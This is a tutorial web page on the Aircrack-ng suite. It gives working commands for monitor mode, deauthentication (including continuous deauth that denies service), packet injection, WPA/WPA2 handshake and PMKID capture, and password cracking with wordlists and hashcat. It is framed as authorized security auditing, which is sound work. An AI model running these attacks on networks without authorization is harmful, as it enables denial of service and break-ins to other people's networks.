Terminal GuideAircrack-ng: Wireless Network Security Audit Guide
Master the Aircrack-ng suite for wireless network security auditing. Learn monitor mode configuration, packet capture, WPA/WPA2 handshake analysis, and comprehensive wireless penetration testing techniques.
Dai Aoki
CEO at init, Inc. / CTO at US & JP startups / Creator of WebTerm
Quick Reference
Monitor Mode
airmon-ng check killKill interfering processesairmon-ng start wlan0Enable monitor modeairmon-ng stop wlan0monDisable monitor modeScanning
airodump-ng wlan0monScan all networksairodump-ng -c 6 --bssid AA:BB wlan0monTarget specific APairodump-ng -w capture wlan0monWrite capture to fileAttacks
aireplay-ng -0 5 -a BSSID wlan0monDeauthentication attackaireplay-ng -3 -b BSSID wlan0monARP replay attackaireplay-ng -1 0 -a BSSID wlan0monFake authenticationCracking
aircrack-ng -w wordlist cap.capWPA dictionary attackaircrack-ng -b BSSID cap.capCrack specific BSSIDaircrack-ng -J hash cap.capExport to hashcat formatUtilities
airmon-ngList wireless interfacesairdecap-ng -w KEY cap.capDecrypt captured packetspacketforge-ng -0 -a BSSID -h MACForge packetsCommon Workflows
airodump-ng -w out -c 6 --bssid APCapture handshakeaireplay-ng -0 1 -a AP -c CLForce client reconnectaircrack-ng -w rockyou.txt out.capCrack with wordlistDownloadable Image Preview
Overview
Aircrack-ng is a complete suite of tools for assessing the security of Wi-Fi networks. It focuses on different areas of wireless security including monitoring, attacking, testing, and cracking. The suite is widely used by penetration testers, security researchers, and network administrators to evaluate the resilience of wireless network configurations.
The suite covers the full spectrum of wireless security auditing: capturing raw 802.11 frames in monitor mode, injecting crafted packets into wireless traffic, performing deauthentication to force handshake exchanges, and recovering WPA/WPA2 pre-shared keys through dictionary and brute-force attacks. Aircrack-ng runs on Linux, macOS, Windows, and BSD, though Linux provides the most complete feature set with the widest range of supported wireless chipsets.
The core suite consists of several key components, each designed for a specific phase of the wireless assessment process. Understanding how these tools work together is essential for conducting effective and methodical wireless security audits.
Legal & Ethical Disclaimer
Installation
Aircrack-ng is available through most package managers and can also be compiled from source for the latest features and driver support.
Debian / Ubuntu (apt):
# Install aircrack-ng from official repositories
sudo apt update
sudo apt install aircrack-ng
# Install with recommended wireless tools
sudo apt install aircrack-ng wireless-tools iwmacOS (Homebrew):
# Install via Homebrew
brew install aircrack-ng
# Note: macOS has limited wireless injection support
# Monitor mode capabilities depend on the wireless chipsetArch Linux:
# Install from official repositories
sudo pacman -S aircrack-ngFrom Source:
# Install build dependencies (Debian/Ubuntu)
sudo apt install build-essential autoconf automake libtool pkg-config
sudo apt install libnl-3-dev libnl-genl-3-dev libssl-dev
sudo apt install ethtool shtool rfkill zlib1g-dev libpcap-dev
sudo apt install libsqlite3-dev libpcre2-dev libhwloc-dev
sudo apt install libcmocka-dev hostapd wpasupplicant
# Clone the repository
git clone https://github.com/aircrack-ng/aircrack-ng.git
cd aircrack-ng
# Build and install
autoreconf -i
./configure --with-experimental
make
sudo make install
# Update the shared library cache
sudo ldconfigSuite Components
The Aircrack-ng suite consists of multiple specialized tools, each handling a different aspect of wireless security assessment. Below are the primary components you will use in most audits.
airmon-ng
airmon-ng manages wireless interface modes. Its primary purpose is to enable and disable monitor mode on wireless adapters, which is required for passive packet capture and active injection attacks.
# List all wireless interfaces and their drivers
airmon-ng
# Check for processes that may interfere with monitor mode
airmon-ng check
# Kill interfering processes (NetworkManager, wpa_supplicant, etc.)
airmon-ng check kill
# Enable monitor mode on wlan0 (creates wlan0mon interface)
airmon-ng start wlan0
# Enable monitor mode on a specific channel
airmon-ng start wlan0 6
# Disable monitor mode and return to managed mode
airmon-ng stop wlan0monairodump-ng
airodump-ng is the packet capture and network discovery component. It captures raw 802.11 frames and displays detected access points and associated clients in real time. It is the primary reconnaissance tool used to identify target networks and capture WPA/WPA2 handshakes.
# Scan all channels and display all detected networks
airodump-ng wlan0mon
# Scan only on a specific channel
airodump-ng -c 6 wlan0mon
# Scan the 5 GHz band
airodump-ng --band a wlan0mon
# Scan both 2.4 GHz and 5 GHz bands
airodump-ng --band abg wlan0mon
# Target a specific access point and write captured data to files
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon
# Filter by encryption type (OPN, WEP, WPA, WPA2)
airodump-ng --encrypt wpa2 wlan0mon
# Display only WPS-enabled networks
airodump-ng --wps wlan0mon
# Write output in different formats
airodump-ng -w output --output-format pcap,csv,kismet wlan0monThe airodump-ng display is divided into two sections. The upper section shows detected access points with their BSSID, power level, beacon count, data frames captured, channel, encryption type, cipher, authentication method, and ESSID (network name). The lower section shows detected clients (stations) and the access point to which each is associated.
aireplay-ng
aireplay-ng generates wireless traffic for use in various attacks. It supports multiple attack modes including deauthentication, fake authentication, ARP replay, chopchop, fragmentation, and interactive packet injection.
# Deauthentication attack: disconnect a client from an AP
# -0 = deauth attack, 10 = number of deauth packets
aireplay-ng -0 10 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0mon
# Broadcast deauthentication (all clients on the AP)
aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF wlan0mon
# Fake authentication with an access point
aireplay-ng -1 0 -e "NetworkName" -a AA:BB:CC:DD:EE:FF -h 00:11:22:33:44:55 wlan0mon
# ARP request replay attack (for WEP)
aireplay-ng -3 -b AA:BB:CC:DD:EE:FF -h 00:11:22:33:44:55 wlan0mon
# Interactive packet replay
aireplay-ng -2 -r captured.cap wlan0mon
# Injection test to verify your adapter supports injection
aireplay-ng -9 wlan0mon
# Injection test against a specific access point
aireplay-ng -9 -e "NetworkName" -a AA:BB:CC:DD:EE:FF wlan0monaircrack-ng
aircrack-ng is the key cracking component of the suite. For WPA/WPA2, it performs dictionary-based attacks against captured four-way handshakes. For WEP, it uses statistical analysis methods (PTW, FMS/KoreK) to recover the encryption key from captured initialization vectors.
# Crack WPA/WPA2 with a wordlist
aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap
# Crack targeting a specific BSSID
aircrack-ng -w wordlist.txt -b AA:BB:CC:DD:EE:FF capture-01.cap
# Use multiple wordlists
aircrack-ng -w wordlist1.txt,wordlist2.txt,wordlist3.txt capture-01.cap
# Crack WEP with collected IVs
aircrack-ng capture-01.cap
# Crack WEP using PTW method (faster, needs ARP packets)
aircrack-ng -z capture-01.cap
# Crack WEP using FMS/KoreK method
aircrack-ng -K capture-01.cap
# Export handshake to hashcat format (hccapx)
aircrack-ng -J hashfile capture-01.cap
# Export handshake to PMKID/EAPOL hash format
aircrack-ng -j hashfile capture-01.cap
# Set the number of CPU threads
aircrack-ng -p 4 -w wordlist.txt capture-01.capMonitor Mode Setup
Monitor mode is a special state for wireless network interfaces that allows the adapter to capture all wireless frames in range, regardless of the destination address. This is the foundation for all wireless auditing activities. Setting up monitor mode correctly is critical for reliable operation.
# Step 1: Identify your wireless interface
iwconfig
# or
ip link show
# Step 2: Check for interfering processes
airmon-ng check
# Step 3: Kill interfering processes
# This stops NetworkManager, wpa_supplicant, and other services
airmon-ng check kill
# Step 4: Enable monitor mode
airmon-ng start wlan0
# Step 5: Verify monitor mode is active
iwconfig wlan0mon
# You should see "Mode:Monitor" in the output
# Step 6: (Optional) Set a specific channel
iwconfig wlan0mon channel 6
# Alternative: Manual monitor mode setup without airmon-ng
sudo ip link set wlan0 down
sudo iw dev wlan0 set type monitor
sudo ip link set wlan0 up
# Restore managed mode after testing
airmon-ng stop wlan0mon
# Restart NetworkManager if needed
sudo systemctl start NetworkManageriw list and look for "monitor" in the "Supported interface modes" section. Some adapters require specific drivers (like the rtl8812au driver for Realtek chipsets) that must be installed separately.WPA/WPA2 Handshake Capture
Capturing a WPA/WPA2 four-way handshake is the essential first step for offline password cracking. The handshake occurs when a client authenticates with an access point. You can either wait for a client to connect naturally or force a reconnection using a deauthentication attack.
# Step 1: Start monitor mode
airmon-ng check kill
airmon-ng start wlan0
# Step 2: Scan for target networks
airodump-ng wlan0mon
# Note the BSSID, channel, and ESSID of the target network
# Step 3: Focus capture on the target network
# Replace BSSID and channel with your target's values
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w handshake wlan0mon
# Step 4: (In a second terminal) Send deauth to force a handshake
# Target a specific client for more reliable results
aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0mon
# Alternatively, broadcast deauth to all clients
aireplay-ng -0 3 -a AA:BB:CC:DD:EE:FF wlan0mon
# Step 5: Verify the handshake was captured
# Look for "WPA handshake: AA:BB:CC:DD:EE:FF" in airodump-ng output
# Verify a capture file contains a valid handshake
aircrack-ng handshake-01.cap
# Use cowpatty to verify the handshake
cowpatty -r handshake-01.cap -cWhen airodump-ng successfully captures a handshake, it displays a "WPA handshake:" message in the upper-right corner of the terminal along with the BSSID. This confirms that the capture file contains the necessary EAPOL frames for offline cracking.
Cracking WPA/WPA2
Once you have captured a valid WPA/WPA2 handshake, you can attempt to recover the pre-shared key using dictionary attacks. The effectiveness depends entirely on whether the password exists in your wordlist. Strong, random passwords are effectively uncrackable with dictionary methods.
# Basic dictionary attack with rockyou wordlist
aircrack-ng -w /usr/share/wordlists/rockyou.txt -b AA:BB:CC:DD:EE:FF handshake-01.cap
# Use multiple wordlists
aircrack-ng -w /usr/share/wordlists/rockyou.txt,custom-wordlist.txt handshake-01.cap
# Use piped input from a password generator
# Example: using crunch to generate passwords on the fly
crunch 8 8 abcdefghijklmnopqrstuvwxyz | aircrack-ng -w - -b AA:BB:CC:DD:EE:FF handshake-01.cap
# Use John the Ripper for advanced password mutations
john --wordlist=wordlist.txt --rules --stdout | aircrack-ng -w - -b AA:BB:CC:DD:EE:FF handshake-01.cap
# Export to hashcat for GPU-accelerated cracking
# Convert to hccapx format
aircrack-ng -J output_hash handshake-01.cap
# Then use hashcat (mode 2500 for WPA/WPA2)
hashcat -m 2500 output_hash.hccapx /usr/share/wordlists/rockyou.txt
# Convert to the newer PMKID/EAPOL hash format for hashcat
aircrack-ng -j output_hash handshake-01.cap
# Use hashcat mode 22000
hashcat -m 22000 output_hash.hc22000 /usr/share/wordlists/rockyou.txt
# Speed up cracking using a pre-computed PMK database (airolib-ng)
# Create database
airolib-ng pmk_db --import essid essid_list.txt
airolib-ng pmk_db --import passwd /usr/share/wordlists/rockyou.txt
airolib-ng pmk_db --batch
# Crack using the pre-computed database
aircrack-ng -r pmk_db handshake-01.capAdvanced Techniques
Deauthentication Attacks
Deauthentication attacks exploit the fact that 802.11 management frames are unauthenticated in WPA/WPA2 networks (this is addressed by 802.11w/PMF). By sending forged deauthentication frames, you can force a client to disconnect from the access point. When the client reconnects, the four-way handshake is exchanged and can be captured.
# Targeted deauthentication (one specific client)
# More reliable and less disruptive than broadcast deauth
aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0mon
# Broadcast deauthentication (all clients on the AP)
aireplay-ng -0 3 -a AA:BB:CC:DD:EE:FF wlan0mon
# Continuous deauthentication (use 0 for unlimited)
# WARNING: This will deny service to all clients continuously
aireplay-ng -0 0 -a AA:BB:CC:DD:EE:FF wlan0mon
# Deauth with a specific reason code
# Reason 7 = Class 3 frame received from nonassociated STA
aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 --deauth-rc 7 wlan0mon
# Using mdk3/mdk4 for more advanced deauthentication
# Deauth all clients on a specific channel
mdk4 wlan0mon d -c 6Packet Injection
Packet injection is the ability to send (inject) crafted wireless frames into a network. This capability is required for deauthentication attacks, ARP replay, and other active attacks. Not all wireless adapters support injection, so testing this capability first is important.
# Test injection capability
# Basic injection test
aireplay-ng -9 wlan0mon
# Test injection against a specific AP
aireplay-ng -9 -e "TargetNetwork" -a AA:BB:CC:DD:EE:FF wlan0mon
# ARP replay injection (used for WEP cracking)
# First, capture an ARP packet, then replay it to generate IVs
aireplay-ng -3 -b AA:BB:CC:DD:EE:FF -h 00:11:22:33:44:55 wlan0mon
# Interactive packet injection from a capture file
aireplay-ng -2 -r captured_packets.cap wlan0mon
# Forge and inject custom packets with packetforge-ng
# Create an ARP request packet
packetforge-ng -0 -a AA:BB:CC:DD:EE:FF -h 00:11:22:33:44:55 \
-k 255.255.255.255 -l 255.255.255.255 -y fragment.xor -w forged_arp.cap
# Inject the forged packet
aireplay-ng -2 -r forged_arp.cap wlan0monPMKID Attack
The PMKID attack, discovered in 2018, allows cracking WPA/WPA2 passwords without capturing a full four-way handshake. Instead, it exploits the PMKID field in the first EAPOL frame sent by the access point. This means you do not need to wait for a client to connect or send deauthentication packets. The PMKID is derived from the PMK, the AP MAC address, and the client MAC address.
# Method 1: Using hcxdumptool (recommended for PMKID capture)
# Install hcxdumptool and hcxtools
sudo apt install hcxdumptool hcxtools
# Capture PMKID from target networks
sudo hcxdumptool -i wlan0mon -o pmkid_capture.pcapng --filterlist_ap=targets.txt \
--filtermode=2 --enable_status=1
# Convert capture to hashcat format
hcxpcapngtool -o pmkid_hash.hc22000 pmkid_capture.pcapng
# Crack with hashcat (mode 22000 for PMKID/EAPOL)
hashcat -m 22000 pmkid_hash.hc22000 /usr/share/wordlists/rockyou.txt
# Method 2: Using aircrack-ng with hcxtools
# Capture with airodump-ng (PMKID is captured in the first EAPOL message)
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w pmkid_capture wlan0mon
# Convert pcap to hc22000 format
hcxpcapngtool -o pmkid.hc22000 pmkid_capture-01.cap
# Verify PMKID was captured
cat pmkid.hc22000 | grep "WPA\*01"Practical Examples
Network Audit Workflow
A complete wireless security audit follows a structured methodology. Below is a typical workflow for auditing a WPA2-protected network with proper authorization.
# ============================================
# Complete Wireless Security Audit Workflow
# ============================================
# Phase 1: Preparation
# Kill interfering processes
airmon-ng check kill
# Enable monitor mode
airmon-ng start wlan0
# Verify monitor mode
iwconfig wlan0mon
# Phase 2: Reconnaissance
# Scan all networks to build a picture of the environment
airodump-ng wlan0mon
# Let this run for 30-60 seconds to identify all networks
# Document findings:
# - Target BSSID and ESSID
# - Channel and encryption type
# - Connected clients (stations)
# - Signal strength (PWR)
# Phase 3: Target Focus
# Lock onto the target network
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w audit_capture wlan0mon
# Phase 4: Handshake Capture
# In a new terminal, deauth a connected client
aireplay-ng -0 3 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0mon
# Wait for "WPA handshake:" confirmation in airodump-ng
# Phase 5: Verification
# Verify the handshake capture
aircrack-ng audit_capture-01.cap
# Phase 6: Password Analysis
# Attempt to crack with common wordlists
aircrack-ng -w /usr/share/wordlists/rockyou.txt -b AA:BB:CC:DD:EE:FF audit_capture-01.cap
# For GPU-accelerated cracking
aircrack-ng -j audit_hash audit_capture-01.cap
hashcat -m 22000 audit_hash.hc22000 /usr/share/wordlists/rockyou.txt
# Phase 7: Cleanup
# Stop monitor mode
airmon-ng stop wlan0mon
# Restart networking
sudo systemctl start NetworkManagerCapturing Handshakes
There are several strategies for reliably capturing WPA/WPA2 handshakes. The approach depends on whether clients are currently connected and how active the network is.
# Strategy 1: Passive Capture (wait for a natural connection)
# Best when you want to avoid detection
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w passive_capture wlan0mon
# Leave running until a client connects naturally
# Strategy 2: Targeted Deauth (most common approach)
# Focus on a single client with the strongest signal
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w deauth_capture wlan0mon
# In another terminal:
aireplay-ng -0 2 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0mon
# Wait a few seconds, then repeat if needed
# Strategy 3: Multiple Client Deauth
# Deauth several clients in sequence for better chances
for client in 11:22:33:44:55:66 AA:BB:CC:DD:EE:11 22:33:44:55:66:77; do
aireplay-ng -0 2 -a AA:BB:CC:DD:EE:FF -c $client wlan0mon
sleep 3
done
# Strategy 4: PMKID-based (no client needed)
# Useful when no clients are connected
sudo hcxdumptool -i wlan0mon -o pmkid_output.pcapng \
--filterlist_ap=target_bssid.txt --filtermode=2
# Verify capture quality
# List all handshakes in a capture file
aircrack-ng audit_capture-01.cap
# Use wireshark to inspect EAPOL frames
tshark -r audit_capture-01.cap -Y "eapol" -T fields -e wlan.sa -e wlan.da -e eapol.typeOptions Reference
Below is a comprehensive reference of the most commonly used options across the Aircrack-ng suite tools.
airmon-ng Options:
| Command / Option | Description |
|---|---|
| airmon-ng | List wireless interfaces |
| airmon-ng check | Check for interfering processes |
| airmon-ng check kill | Kill interfering processes |
| airmon-ng start <iface> | Enable monitor mode |
| airmon-ng start <iface> <chan> | Enable monitor mode on specific channel |
| airmon-ng stop <iface> | Disable monitor mode |
airodump-ng Options:
| Option | Description |
|---|---|
| -c <channel> | Lock to a specific channel |
| --bssid <BSSID> | Filter by access point MAC address |
| -w <prefix> | Write capture to file with given prefix |
| --band <band> | Set band (a = 5 GHz, bg = 2.4 GHz, abg = both) |
| --encrypt <type> | Filter by encryption type (OPN, WEP, WPA, WPA2) |
| --wps | Display WPS information |
| --output-format <fmt> | Output format: pcap, ivs, csv, gps, kismet, netxml |
| -a | Filter unassociated clients |
aireplay-ng Attack Modes:
| Option | Attack Type | Description |
|---|---|---|
| -0 | Deauthentication | Disconnect clients from AP |
| -1 | Fake Authentication | Associate with AP without valid key |
| -2 | Interactive Replay | Select and replay specific packets |
| -3 | ARP Replay | Replay ARP requests to generate IVs |
| -4 | KoreK ChopChop | Decrypt WEP data packets |
| -5 | Fragmentation | Obtain keystream from WEP packets |
| -6 | Cafe Latte | Obtain WEP key from client |
| -7 | Client-oriented Fragmentation | Fragment attack targeting clients |
| -9 | Injection Test | Verify injection capability |
aircrack-ng Options:
| Option | Description |
|---|---|
| -w <wordlist> | Path to wordlist file (use - for stdin) |
| -b <BSSID> | Target BSSID to crack |
| -e <ESSID> | Target ESSID (network name) |
| -J <file> | Export to hccapx format for hashcat |
| -j <file> | Export to hc22000 format for hashcat |
| -r <database> | Use pre-computed PMK database (airolib-ng) |
| -p <threads> | Number of CPU threads to use |
| -z | Use PTW method for WEP cracking |
| -K | Use FMS/KoreK method for WEP cracking |
| -l <file> | Write the key to a file when found |
Tips & Best Practices
Following these best practices will improve the reliability and effectiveness of your wireless security assessments while maintaining ethical standards.
General Best Practices
- Always get written authorization before conducting any wireless security assessment. Document the scope, target networks, and testing window in a formal engagement agreement.
- Use a dedicated wireless adapter for auditing. Keep your primary network connection on a separate interface so you can maintain internet access and communicate during testing.
- Minimize deauthentication frames to reduce impact on legitimate users. Use targeted deauths against specific clients rather than broadcast deauths, and send only as many frames as needed.
- Work close to the target AP for the best signal quality. A stronger signal means more reliable packet capture and injection, and fewer corrupted frames.
- Save all capture files and maintain a chain of custody. Use descriptive filenames with timestamps and target identifiers for your documentation.
- Check for 802.11w (PMF) on the target network. Protected Management Frames prevent deauthentication attacks, so you may need alternative approaches such as the PMKID method.
- Use external antennas when possible. High-gain directional antennas improve both capture range and packet injection success rates at greater distances.
- Pre-compute PMK databases with airolib-ng for networks you test frequently. This dramatically speeds up the cracking process for known ESSIDs.
- Monitor channel utilization during assessments. Heavily congested channels may cause packet loss and reduce the reliability of injection attacks.
- Combine tools for best results. Use Wireshark to verify capture quality, hashcat for GPU-accelerated cracking, and Nmap for post-authentication network assessment.
Wordlist Strategy
- Start with targeted wordlists based on the organization or region. Default router passwords, company names, phone numbers, and local terms are common password choices.
- Use rule-based mutations with hashcat or John the Ripper to expand your wordlists with common substitutions (a to @, s to $, e to 3) and appended numbers.
- Consider the password policy context. WPA/WPA2 passwords must be 8-63 characters, so filter out shorter entries from your wordlists to save time.
- Use crunch for pattern-based generation when you know parts of the password format (e.g., company name + 4 digits).
Related Tools
Aircrack-ng works well alongside other security tools to provide a comprehensive wireless and network security assessment. Here are some commonly used complementary tools:
| Tool | Purpose | Use With Aircrack-ng |
|---|---|---|
| Wireshark / tshark | Network protocol analyzer | Inspect captured packets, verify EAPOL frames, analyze traffic |
| hashcat | GPU-accelerated password cracking | Crack exported handshakes at significantly higher speeds |
| hcxdumptool | PMKID / EAPOL capture tool | Capture PMKID without requiring connected clients |
| Nmap | Network scanner | Post-authentication network reconnaissance and service discovery |
| Kismet | Wireless network detector | Passive wireless reconnaissance, detect hidden networks |
| Reaver / Bully | WPS brute force | Attack WPS-enabled routers to recover WPA/WPA2 key |
| mdk3 / mdk4 | Wireless attack tool | Advanced deauthentication, beacon flooding, SSID probing |
| John the Ripper | Password cracker | Generate mutated wordlists, pipe to aircrack-ng for cracking |
Aircrack-ng remains one of the most essential tools in any wireless security professional's toolkit. Its combination of packet capture, injection, and cracking capabilities in a single suite makes it the standard for wireless security assessments. When used responsibly and with proper authorization, it helps organizations identify and remediate wireless security weaknesses before they can be exploited by malicious actors.
Related Articles
Wireshark & tshark: Network Protocol Analyzer Guide
Master Wireshark and tshark for network traffic analysis. Learn capture filters, display filters, protocol dissection, and CLI-based packet analysis.
Nmap: Network Scanner & Security Auditing Tool Guide
Comprehensive guide to Nmap for network discovery and security auditing. Learn port scanning, OS detection, NSE scripts, and practical penetration testing workflows.
Hashcat: Advanced Password Recovery Guide
Master Hashcat for GPU-accelerated password recovery. Learn attack modes, hash types, rule-based attacks, and optimization techniques.
THC Hydra: Network Login Brute Force Guide
Complete guide to THC Hydra for network authentication testing. Learn protocol-specific attacks for SSH, FTP, HTTP, and more with practical examples.